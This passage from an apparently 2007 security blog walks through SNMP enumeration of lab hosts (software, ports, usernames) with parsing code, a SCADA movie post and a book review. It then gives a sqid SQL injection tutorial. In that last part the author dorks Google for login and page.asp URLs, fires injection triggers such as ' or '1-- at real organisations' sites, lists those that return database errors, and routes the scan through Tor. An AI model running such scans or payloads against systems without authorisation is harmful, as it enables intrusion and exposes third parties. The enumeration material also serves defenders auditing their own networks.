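            while i < len(lines) and lines[i] != RULE:
                if lines[i] and not PROMPT_RE.match(lines[i]):
                    body.append(lines[i])
                i += 1
            sections[title] = body
        else:
            i += 1
    return sections


def listening_ports(sections: Dict[str, List[str]], proto: str = "TCP") -> List[int]:
    """Sorted integer ports from the 'LISTENING TCP PORTS' / 'LISTENING UDP PORTS' section."""
    return sorted(int(p) for p in sections.get(f"LISTENING {proto} PORTS", []) if p.isdigit())


def diff_against_baseline(sections: Dict[str, List[str]], baseline: dict) -> Dict[str, List[str]]:
    """Everything the read-only community revealed that the baseline does not allow: extra
    listening TCP ports, software outside the approved list, unexpected local accounts.
    An empty dict means the host matches its baseline."""
    findings: Dict[str, List[str]] = {}
    extra = [str(p) for p in listening_ports(sections) if p not in baseline["tcp_ports"]]
    if extra:
        findings["unexpected_tcp_ports"] = extra
    for section, key in (("INSTALLED SOFTWARE", "software"), ("USERS", "users")):
        extra = [e for e in sections.get(section, []) if e not in baseline[key]]
        if extra:
            findings[f"unexpected_{key}"] = extra
    return findings


if __name__ == "__main__":
    report = parse_snmpenum(SAMPLE_OUTPUT)
    print({title: len(entries) for title, entries in report.items()})
    print(diff_against_baseline(report, BASELINE))
```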

Another fun tool is snmpwalk. It's not for the faint of heart: you need to know what MIB you are looking for, otherwise you can get information overload.

Running it with no options will give you usage info:

[root@localhost snmpenum]# snmpwalk
No hostname specified.
USAGE: snmpwalk [OPTIONS] AGENT [OID]

Version: 5.2.1.2
Web: http://www.net-snmp.org/
Email: net-snmp-coders@lists.sourceforge.net

OPTIONS:
-h, --help display this help message
-H display configuration file directives understood
-v 1|2c|3 specifies SNMP version to use
-V, --version display package version number
SNMP Version 1 or 2c specific
-c COMMUNITY set the community string
SNMP Version 3 specific
-a PROTOCOL set authentication protocol (MD5|SHA)
-A PASSPHRASE set authentication protocol pass phrase
-e ENGINE-ID set security engine ID (e.g. 800000020109840301)
-E ENGINE-ID set context engine ID (e.g. 800000020109840301)
-l LEVEL set security level (noAuthNoPriv|authNoPriv|authPriv)
-n CONTEXT set context name (e.g. bridge1)
-u USER-NAME set security name (e.g. bert)
-x PROTOCOL set privacy protocol (DES|AES)
-X PASSPHRASE set privacy protocol pass phrase
-Z BOOTS,TIME set destination engine boots/time
General communication options
-r RETRIES set the number of retries
-t TIMEOUT set the request timeout (in seconds)
Debugging
-d dump input/output packets in hexadecimal
-D TOKEN[,...] turn on debugging output for the specified TOKENs
(ALL gives extremely verbose debugging output)
General options
-m MIB[:...] load given list of MIBs (ALL loads everything)
-M DIR[:...] look in given list of directories for MIBs
-P MIBOPTS Toggle various defaults controlling MIB parsing:
u: allow the use of underlines in MIB symbols
c: disallow the use of "--" to terminate comments
d: save the DESCRIPTIONs of the MIB objects
e: disable errors when MIB symbols conflict
w: enable warnings when MIB symbols conflict
W: enable detailed warnings when MIB symbols conflict
R: replace MIB symbols from latest module
-O OUTOPTS Toggle various defaults controlling output display:
0: print leading 0 for single-digit hex characters
a: print all strings in ascii format
b: do not break OID indexes down
e: print enums numerically
E: escape quotes in string indices
f: print full OIDs on output
n: print OIDs numerically
q: quick print for easier parsing
Q: quick print with equal-signs
s: print only last symbolic element of OID
S: print MIB module-id plus last element
t: print timeticks unparsed as numeric integers
T: print human-readable text along with hex strings
u: print OIDs using UCD-style prefix suppression
U: don't print units
v: print values only (not OID = value)
x: print all strings in hex format
X: extended index format
-I INOPTS Toggle various defaults controlling input parsing:
b: do best/regex matching to find a MIB node
h: don't apply DISPLAY-HINTs
r: do not check values for range/type legality
R: do random access to OID labels
u: top-level OIDs must have '.' prefix (UCD-style)
s SUFFIX: Append all textual OIDs with SUFFIX before parsing
S PREFIX: Prepend all textual OIDs with PREFIX before parsing
-L LOGOPTS Toggle various defaults controlling logging:
e: log to standard error
o: log to standard output
n: don't log at all
f file: log to the specified file
s facility: log to syslog (via the specified facility)

(variants)
[EON] pri: log to standard error, output or /dev/null for level 'pri' and above
[EON] p1-p2: log to standard error, output or /dev/null for levels 'p1' to 'p2'
[FS] pri token: log to file/syslog for level 'pri' and above
[FS] p1-p2 token: log to file/syslog for levels 'p1' to 'p2'
-C APPOPTS Set various application specific behaviours:
p: print the number of variables found
i: include given OID in the search range
I: don't include the given OID, even if no results are returned
c: do not check returned OIDs are increasing
t: Display wall-clock time to complete the request
[root@localhost snmpenum]#

As you can see, it's a stout program.

I'll run it against the same box we hit with snmpenum.pl:

[root@localhost snmpenum]# snmpwalk -c public 192.168.38.200 -v 2c
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 Model 2 Stepping 8 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.2
SNMPv2-MIB::sysUpTime.0 = Timeticks: (887110) 2:27:51.10
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: LSO-DEV
SNMPv2-MIB::sysLocation.0 = STRING:
SNMPv2-MIB::sysServices.0 = INTEGER: 76
---BIG BIG SNIP--

We can use grep to narrow the walk down to the rows we care about. If you have grep kung fu you can add some cuts to trim the output down to just the software name.

Installed Software:

[root@localhost snmpenum]# snmpwalk -c public 192.168.38.200 -v 1 | grep hrSWInstalledName
HOST-RESOURCES-MIB::hrSWInstalledName.1 = STRING: "freeSSHd 1.0.9"
HOST-RESOURCES-MIB::hrSWInstalledName.2 = STRING: "freeFTPd 1.0.8"
HOST-RESOURCES-MIB::hrSWInstalledName.3 = STRING: "CesarFTP 0.99g"
HOST-RESOURCES-MIB::hrSWInstalledName.4 = STRING: "Microsoft SQL Server 2000"
HOST-RESOURCES-MIB::hrSWInstalledName.5 = STRING: "PeerCast (remove only)"
HOST-RESOURCES-MIB::hrSWInstalledName.6 = STRING: "TFTP Server TFTPDWIN version 0.4.2"
HOST-RESOURCES-MIB::hrSWInstalledName.7 = STRING: "Bitvise WinSSHD 4.19 (remove only)"
HOST-RESOURCES-MIB::hrSWInstalledName.8 = STRING: "VMware Tools"
HOST-RESOURCES-MIB::hrSWInstalledName.9 = STRING: "WebFldrs"
HOST-RESOURCES-MIB::hrSWInstalledName.10 = STRING: "UltraVNC v1.0.2"
[root@localhost snmpenum]#

Listening UDP Ports:

[root@localhost snmpenum]# snmpwalk -c public 192.168.38.200 -v 1 | grep udpLocalPort
UDP-MIB::udpLocalPort.0.0.0.0.135 = INTEGER: 135
UDP-MIB::udpLocalPort.0.0.0.0.161 = INTEGER: 161
UDP-MIB::udpLocalPort.0.0.0.0.445 = INTEGER: 445
UDP-MIB::udpLocalPort.0.0.0.0.1029 = INTEGER: 1029
UDP-MIB::udpLocalPort.0.0.0.0.1034 = INTEGER: 1034
UDP-MIB::udpLocalPort.0.0.0.0.1434 = INTEGER: 1434
UDP-MIB::udpLocalPort.0.0.0.0.3456 = INTEGER: 3456
UDP-MIB::udpLocalPort.127.0.0.1.1053 = INTEGER: 1053
UDP-MIB::udpLocalPort.192.168.38.200.137 = INTEGER: 137
UDP-MIB::udpLocalPort.192.168.38.200.138 = INTEGER: 138
UDP-MIB::udpLocalPort.192.168.38.200.500 = INTEGER: 500
[root@localhost snmpenum]#

Enumerating users on the box:

[root@localhost snmpenum]# snmpwalk -c public 192.168.38.200 -v 1 1.3 | grep 77.1.2.25
SNMPv2-SMI::enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.65.115.109.105.116.104 = STRING: "Asmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.66.115.109.105.116.104 = STRING: "Bsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.68.115.109.105.116.104 = STRING: "Dsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.69.115.109.105.116.104 = STRING: "Esmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.70.115.109.105.116.104 = STRING: "Fsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.71.115.109.105.116.104 = STRING: "Gsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.72.115.109.105.116.104 = STRING: "Hsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.74.115.109.105.116.104 = STRING: "Jsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.75.115.109.105.116.104 = STRING: "Ksmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.76.115.109.105.116.104 = STRING: "Lsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.77.115.109.105.116.104 = STRING: "Msmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.78.115.109.105.116.104 = STRING: "Nsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.79.115.109.105.116.104 = STRING: "Osmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.80.115.109.105.116.104 = STRING: "Psmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.81.115.109.105.116.104 = STRING: "Qsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.82.115.109.105.116.104 = STRING: "Rsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.83.115.109.105.116.104 = STRING: "Ssmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.84.115.109.105.116.104 = STRING: "Tsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.85.115.109.105.116.104 = STRING: "Usmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.86.115.109.105.116.104 = STRING: "Vsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.87.115.109.105.116.104 = STRING: "Wsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.88.115.109.105.116.104 = STRING: "Xsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.89.115.109.105.116.104 = STRING: "Ysmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.90.115.109.105.116.104 = STRING: "Zsmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.99.115.109.105.116.104 = STRING: "csmith"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.109.101.97.110.105.101 = STRING: "meanie"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.7.108.105.110.110.101.97.103 = STRING: "linneag"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.14.84.115.73.110.116.101.114.110.101.116.85.115.101.114 = STRING: "TsInternetUser"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.15.73.85.83.82.95.86.73.67.84.73.77.45.87.50.75 = STRING: "IUSR_VICTIM-W2K"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.15.73.87.65.77.95.86.73.67.84.73.77.45.87.50.75 = STRING: "IWAM_VICTIM-W2K"
[root@localhost snmpenum]#
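Here is an added example (mine, not from the post or from net-snmp) that does the narrowing in Python instead of grep and cut. It parses snmpwalk's `OID = TYPE: value` lines, pulls out the installed-software and UDP-listener rows, and decodes the LAN Manager user-table index, which is the username's length followed by its ASCII bytes (that is why "Guest" shows up under `.5.71.117.101.115.116`). The input is a constructed excerpt of the walk output shown above, so it runs without a target.

```python
"""Offline parsing of snmpwalk output: installed software, UDP listeners and
the enterprises.77.1.2.25 (LAN Manager svUserName) user table.

Added example, not code from the original post or from net-snmp.  SAMPLE is a
constructed excerpt of the snmpwalk lines shown above."""
import re

# Constructed sample: a handful of rows in the shape snmpwalk prints them.
SAMPLE = """\
HOST-RESOURCES-MIB::hrSWInstalledName.1 = STRING: "freeSSHd 1.0.9"
HOST-RESOURCES-MIB::hrSWInstalledName.4 = STRING: "Microsoft SQL Server 2000"
HOST-RESOURCES-MIB::hrSWInstalledName.10 = STRING: "UltraVNC v1.0.2"
UDP-MIB::udpLocalPort.0.0.0.0.161 = INTEGER: 161
UDP-MIB::udpLocalPort.0.0.0.0.1434 = INTEGER: 1434
UDP-MIB::udpLocalPort.192.168.38.200.137 = INTEGER: 137
SNMPv2-SMI::enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.15.73.85.83.82.95.86.73.67.84.73.77.45.87.50.75 = STRING: "IUSR_VICTIM-W2K"
"""

# One walk row: "<oid> = <TYPE>: <value>"; the value may be empty (sysContact above).
LINE = re.compile(r'^(?P<oid>\S+) = (?P<type>[A-Za-z0-9-]+): ?(?P<val>.*)$')


def parse(text):
    """Yield (oid, type, value) triples, stripping the quotes snmpwalk puts round STRINGs."""
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        val = m.group('val')
        if m.group('type') == 'STRING' and len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1]
        yield m.group('oid'), m.group('type'), val


def installed_software(text):
    """Just the software names, i.e. what the grep | cut pipeline is after."""
    return [v for oid, _, v in parse(text) if 'hrSWInstalledName.' in oid]


def udp_listeners(text):
    """(bind address, port) pairs; the udpLocalPort index is <addr>.<port>."""
    out = []
    for oid, _, _ in parse(text):
        if 'udpLocalPort.' not in oid:
            continue
        idx = oid.split('udpLocalPort.', 1)[1].split('.')
        out.append(('.'.join(idx[:4]), int(idx[4])))
    return out


def decode_lanmgr_index(oid):
    """svUserName rows are indexed by the name itself: length, then one sub-id per ASCII byte."""
    tail = oid.split('77.1.2.25.1.1.', 1)[1]
    nums = [int(x) for x in tail.split('.')]
    n, chars = nums[0], nums[1:]
    if len(chars) != n:
        raise ValueError('index says %d bytes, got %d' % (n, len(chars)))
    return ''.join(chr(c) for c in chars)


def users(text):
    """Decode names from the OID index and cross-check them against the STRING value."""
    out = []
    for oid, _, v in parse(text):
        if '77.1.2.25.1.1.' not in oid:
            continue
        name = decode_lanmgr_index(oid)
        if name != v:
            raise ValueError('index %r does not match value %r' % (name, v))
        out.append(name)
    return out


if __name__ == '__main__':
    print('software :', installed_software(SAMPLE))
    print('udp      :', udp_listeners(SAMPLE))
    print('users    :', users(SAMPLE))
```

Save a full walk to a file (`snmpwalk -v 1 -c public 192.168.38.200 > walk.txt`) and feed it to these functions. It is also quieter to walk only the subtree you need, e.g. `snmpwalk -v 1 -c public 192.168.38.200 1.3.6.1.4.1.77.1.2.25` for the user table, rather than walking everything from `1.3` and grepping.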

It also works on Linux, but you don't get quite as much info:

[root@localhost snmpenum]# perl snmpenum.pl 192.168.38.201 public linux.txt

----------------------------------------
UPTIME
----------------------------------------
17 days, 19:00:39.53

----------------------------------------
RUNNING PROCESSES
----------------------------------------
ERROR: No response from remote host '192.168.38.201'

----------------------------------------
MOUNTPOINTS
---------------------------------------
/
/boot
/dev/shm
Real Memory
Swap Space
Memory Buffers

----------------------------------------
RUNNING SOFTWARE PATHS
----------------------------------------
init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush

----------------------------------------
HOSTNAME
----------------------------------------
redhat.lso.com

----------------------------------------
LISTENING UDP PORTS
----------------------------------------
111
137
138
161
721
32768

----------------------------------------
SYSTEM INFO
----------------------------------------
Linux redhat.lso.com 2.4.20-8 #1 Sat Jul 21 17:54:28 EST 2003 i686

----------------------------------------
LISTENING TCP PORTS
----------------------------------------
21
22
25
80
111
139
143
199
443

LINKS

MS Technet "How SNMP works"

CG

Thursday, July 19, 2007

Live Free or Die Hard & SCADA Security


Live Free or Die Hard

Ok, while talking about movies is not totally security stuff, there was a bunch of SCADA hacking going on in the movie that was entertaining. I thought the movie was good, except for one part where the kid pulls out what looks like the PIN cracker from the Terminator movie and it cracks the PIN for a door protecting these NSA servers. I don't want to say that the rest of the movie was "believable," but the hand waving and magic at that point kinda disappointed me because they did such a good job with the rest of the flick. Oh well.

There were some rumors going around that there would be some Metasploit action in the movie, but there wasn't. Kinda disappointing in that respect; that would have been almost as exciting as the SSH attack in The Matrix.


More on the SCADA stuff: there has been a lot of talk for years about SCADA vulnerabilities; hell, you can even get a class on it from InfoSec Institute. Obviously the issue arises when you have a system that runs on, really, any OS, that requires internet access, yet you can't patch the box. DoD has systems like this that run some special application that breaks if you patch the box, or you'll have crap that only runs on Windows 98 or Windows 2000 SP0, and no one wants to pay to have someone redevelop the application and would instead rather get the whole network, VLAN (hopefully), or segment owned. For the life of me I can't imagine what guy accepted an application that runs on a computer that could never be updated, but I am sure they had their reasons (ignorance, bribes, etc.). I think that time and money would be better spent developing a web solution that can do the same thing. That way you have to worry about securing ONE server, application, database, etc., instead of the multitude of computers spread across the world.

Anyway, I'll go out on a limb and say that "security by obscurity" has been proven ineffective and we should definitely move away from it, especially when (national) infrastructure is involved.


LINKS

SCADA Security and Terrorism: We're Not Crying Wolf:
http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf

SCADA system makers pushed toward security:
http://www.securityfocus.com/news/11402

Utility hack led to security overhaul:
http://www.computerworld.com/securitytopics/security/story/0,10801,108735,00.html

Hacking SCADA/SAS Systems:
http://www.ptil.no/NR/rdonlyres/F09CB606-7DEC-4062-B5FE-83D1D8D1E63A/12230/MicrosoftPowerPoint4HackingSCADAPTIL.pdf

eEye Marc Maiffret Congress Testimony
http://research.eeye.com/html/papers/download/Maiffret-Congress-Infrastructure.pdf

https://www.pcsforum.org/events/2007/atlanta/legacy.pdf

Information Technology (IT) Security for Supervisory Control and Data Acquisition (SCADA) Systems:
http://cipp.gmu.edu/archive/127_DallasGunnerson_SCADA.pdf

A Plan for SCADA Security:
http://www.itoc.usma.edu/Workshop/2005/Papers/Follow%20ups/WP%20IEEE%20(Jun%202005)%20-%20Next%20Gen%20SCADA%20Security.pdf
CG

Tuesday, July 17, 2007

Blackjacking Book Review



Blackjacking: Security Threats to BlackBerry Devices, PDAs, and Cell Phones in the Enterprise
By Daniel V Hoffman

Blackjacking takes on the task of educating both administrators and management about the threats mobile devices pose to their enterprise. I believe this book succeeds in its task and serves as a great reference not only for the BlackBerry Enterprise Server (BES) administrators out there but also for network administrators, help desk personnel, and security personnel, as well as a book that can aid in the education of end users. It is written in a tone and dialog that is useful to both the technical and the non-technical reader, and it does well digging into the relatively new field of mobile device (especially BlackBerry) security.

The book starts out with a very good overview of the threats to mobile devices (Malware, Direct Attack, Data Communication Interception, Spoofing and Sniffing, and Physical Compromise). It then moves into an excellent overview of the devices that will be covered in the book (BlackBerrys, Pocket PCs, Palm Handhelds, and Cell Phones).
From there each device is covered in depth with “Exploiting the Device”, “Hacking the Supporting Device Infrastructure”, and “Protecting your PC and LAN from the Device.”

The BlackBerry section (which is probably why you are thinking about purchasing the book) does a great job covering the current and future attacks given the fairly limited publicly available research, tools, and code, and gives solid advice on setting up your network infrastructure to deal with the growing threat from mobile devices. The vignettes discussing plausible attacks for each attack scenario serve as good, feasible examples to think about for your enterprise and users and how to protect your network.

Likes: Discussion of how BlackBerry communications work with your cell phone provider and within a BlackBerry Enterprise Server environment, all the background material on the BlackBerry device, multiple examples (for further research on what is best for your environment) for AV and firewall solutions for each type of device, and seeing attacks on most of the threats in the lab using available tools.

Dislikes: while not in the scope of the book, more code examples would be nice (of course it would take away from the usability of the book for "non-technical" people), and the book didn't list links for the tools and malware discussed (yes, I know Google exists).

Overall an excellent book. I purchased the book for my BlackBerry admin (but I read it first ☺) and I think he will find it useful since he is not a "security" guy. It really ties together networking best practices and technologies and, while not a "BlackBerry (or mobile device) or network lockdown guide," Blackjacking serves as a good reference for further research into AV, firewalls, and VPNs for mobile devices, as well as safe methods for allowing those devices entry and access into your network.

Links
DISA SECURITY TECHNICAL IMPLEMENTATION GUIDE (STIG) for BlackBerry Devices
http://iase.disa.mil/stigs/checklist/Wireless_STIG_BlackBerry_Checklist_V5R1_2.doc

Good Post on Security Basics
http://seclists.org/basics/2005/Apr/0254.html


Technical White Paper BlackBerry™ Security
www.blackberry.net/support/pdfs/bb_security_technical_wp_exchange_21.pdf




CG

Saturday, July 14, 2007

Using sqid (SQL Injection Digger) to look for SQL Injection


SQL injection digger is a command line program that looks for SQL injections and common errors in websites.
It can perform the following operations:
  • Look for SQL injection in a webpage, by looking for links.
  • Submit forms in a webpage to look for SQL injection.
  • Crawl a website to perform the above listed operations.
  • Perform a google search for a query and look for SQL injections in the urls found.
http://sqid.rubyforge.org/

Let's see it in action

sqid run with the help (-h) argument:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -h
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

Usage: sqid.rb [options]

options:
-m, --mode MODE Operate in mode MODE.
MODE is one of
g,google Operate in google search mode.
u,url Check this url or a file with urls.
p,page Check single page.
c,crawl Crawl website and check.

Google search mode options:

-q, --query QUERY QUERY to perforn google search for.
-s, --start START zero-based index of the first desired result,
zero if not specified.
-r, --results RESULTS number of results desired, default is 20 if not specfied.
rounded to tens.

URL check mode options:
-u, --url URL check this URL.
If URL is a file urls will be loaded from this file, specify each url on a new line.

Page check mode options:

-p, --page PAGE Check this page.

Crawl mode options:
-c, --crawl WEBSITE Crawl website WEBSITE and check.
specify as http[s]://WESITE:[PORT], default PORT is 80

URL, Page and Crawl mode common options:
-C, --cookie COOKIE Cookie in the HTTP header specify as name=value,name=value.
If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line.

-a, --accept-cookies Accept cookies from the webite or page. Default is no.
-R, --referer REFERER Set referer in the HTTP header.
-B, --auth CREDENTIALS Use credentials as basic auth for the website.
specify as user:password.

Common options:

-o, --with-noquery Match page content without query parameters. Default is false.
-D, --db-files FILE,...,FILE Use file(s) FILE,...,FILE as signature database.
-t, --trigger TRIGGER Use TRIGGER for detecting SQL injections/errors default is '.
If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline.

Lines starting with a # are ignored.

-T, --time-out TIMEOUT Timeout for response in seconds.
Default is 10 seconds.

-U, --user-agent USERAGENT User Agent in the HTTP Header. Default is SQID/0.3.
-P, --proxy PROXY User HTTP proxy PROXY for operations.
specfify as proxy:port.
-A, --proxy-auth CREDENTIALS Use crendtials CRENDENTIALS for the proxy.
specfify as user:password.

-v, --verbose Run verbosely.
-h, --help Show this message


Let's play with the google query:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m g -q inurl:page.asp -s 0 -r 50
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting 50 links from search inurl:page.asp starting from 0.
[+] Done got 50 links.
[*] Going to check 50 urls.

500 VBScript / ASP error => http://www.ddcf.org/page.asp?pageId='
500 MS-SQL Server error => http://www.unctad.org/Templates/Page.asp?intItemID='
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID='&DID=3079
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID=72&DID='
500 VBScript / ASP error => http://www.airweb.org/page.asp?page='
500 VBScript runtime error => http://www.airweb.org/page.asp?page='
Timed out => http://www.pebblebeach.com/page.asp?id='
500 VBScript / ASP error => http://www.royalsoc.ac.uk/page.asp?id='
500 VBScript runtime error => http://www.royalsoc.ac.uk/page.asp?id='
500 ADODB Error => http://www.yased.org.tr/page.asp?pageid='
500 VBScript / ASP error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript runtime error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript / ASP error => http://www.browsealoud.com/page.asp?pg_id='
500 VBScript runtime error => http://www.browsealoud.com/page.asp?pg_id='
[*] Warning: Client error 404 Page not found, http://policyresearch.gc.ca/page.asp?pagenm='.
500 VBScript runtime error => http://philanthropy.moodys.com/page.asp?template='&context=cmr&section=hglts
500 No match => http://philanthropy.moodys.com/page.asp?template=cmr&context='&section=hglts
Error getaddrinfo: No address associated with nodename, http://www.airindiaexpress.co.in/page.asp?pageid='.
500 VBScript runtime error => http://www.bscs.org/page.asp?pageid='&id=0%7Cevolution_programs
500 VBScript / ASP error => http://www.televue.com/engine/page.asp?cat='
500 VBScript runtime error => http://www.televue.com/engine/page.asp?cat='
500 MS-Access error => http://www.northernirelandscreen.co.uk/page.asp?id='
500 No match => http://www.airindia.com/page.asp?pageid='
500 MS-SQL Server error => http://www.seaair.info/page.asp?page='

[*] Checked 44 URLs.


A closer look at the query: sqid.rb -m g -q inurl:page.asp -s 0 -r 50

-m g operate in Google search mode
-q query = "inurl:page.asp"
-s start with result 0
-r return 50 results (rounded to tens, per the help)

You can use sqid to check a URL:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m u -u http://www.site.info/page.asp?page=
sqid v0.3 - SQL Injection digger.

Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org


[*] Going to check 1 urls.


500 MS-SQL Server error => http://www.site.info/page.asp?page='


[*] Checked 1 URLs.


You can use sqid to check a page:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m p -p http://www.site.info/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting links from page http://www.site.info/.

[*] Invalid URL: bad URI(is not URI?): %20http://www.site.org.za

[+] Done got 2 links.

[*] Going to check 2 urls.

500 MS-SQL Server error => http://www.site.info/page.asp?page='

[*] Checked 2 URLs.

You can use sqid to crawl a site as well:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.

[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Getting http://www.carnal0wnage.com/research.html.
[v] Getting http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Getting http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Getting http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Getting http://www.carnal0wnage.com/about.html.
[v] Getting http://www.carnal0wnage.com/links.html.
[v] Getting http://www.carnal0wnage.com//pvt/phackvideos.html.
[*] Warning: Client error 401 Authorization Required, http://www.carnal0wnage.com//pvt/phackvideos.html.
[+] Done got 32 links.
[*] Going to check 32 urls.

[v] Checking URL http://www.carnal0wnage.com/main.html.
[v] Checking URL http://www.carnal0wnage.com/papers.html.
[v] Checking URL http://www.carnal0wnage.com/hackvideos/index.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T2_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/research.html.
[v] Checking URL http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Checking URL http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Checking URL http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Checking URL http://www.carnal0wnage.com/about.html.
[v] Checking URL http://www.carnal0wnage.com/links.html.
[v] Checking URL http://www.carnal0wnage.com//pvt/phackvideos.html.

[*] Checked 32 URLs.

Tunnel that stuff through Tor (sqid's -P only speaks to an HTTP proxy, so point it at a Privoxy listener, port 8118 by default, that forwards to Tor's SOCKS port):

SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -P localhost:8118 -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
---snip---

By default, sqid only checks for SQL injection with a single quote (') as the trigger. You can supply your own trigger file with -t if you want: one trigger per line, and lines starting with # are ignored.

Adding a trigger file:
SegFault:~/sqid/sqid cg$ cat trigger2
'
' or '1
' or ' 1
' or '1--
' or ' 1--


SegFault:~/sqid/sqid cg$ ruby sqid.rb -P localhost:8118 -m g -q inurl:login.asp -t trigger2
sqid v0.3 - SQL Injection digger.

Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting 20 links from search inurl:login.asp starting from 0.

[+] Done got 20 links.

[*] Going to check 20 urls.


500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201

500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201

